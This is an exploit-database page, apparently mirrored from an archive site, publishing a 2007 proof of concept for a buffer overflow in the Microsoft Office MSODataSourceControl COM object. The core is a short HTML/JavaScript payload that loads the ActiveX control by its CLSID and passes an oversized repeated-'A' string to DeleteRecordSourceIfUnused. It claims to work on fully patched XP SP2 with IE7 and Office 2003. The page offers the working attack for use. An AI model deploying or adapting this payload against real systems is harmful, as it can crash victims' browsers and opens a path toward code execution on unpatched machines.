Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
# Published : 2007-06-13
# Author : YAG KOHHA
# Previous Title : HTTP SERVER (httpsv) 1.6.2 (GET 404) Remote Denial of Service Exploit
# Next Title : Ace-FTP Client 1.24a Remote Buffer Overflow PoC

MSODataSourceControl.DeleteRecordSourceIfUnused COM-object B0F POC
Tested on full patched XP/SP2, IE7, MSO2003

<html>
<object id=ctl classid="clsid:{0002E55B-0000-0000-C000-000000000046}"></object>
<script language="javascript">
var b = 'AAAA';
while (b.length <= 256) b+=b;
ctl.DeleteRecordSourceIfUnused(b);
</script>
</html>

# www.Syue.com [2007-06-13]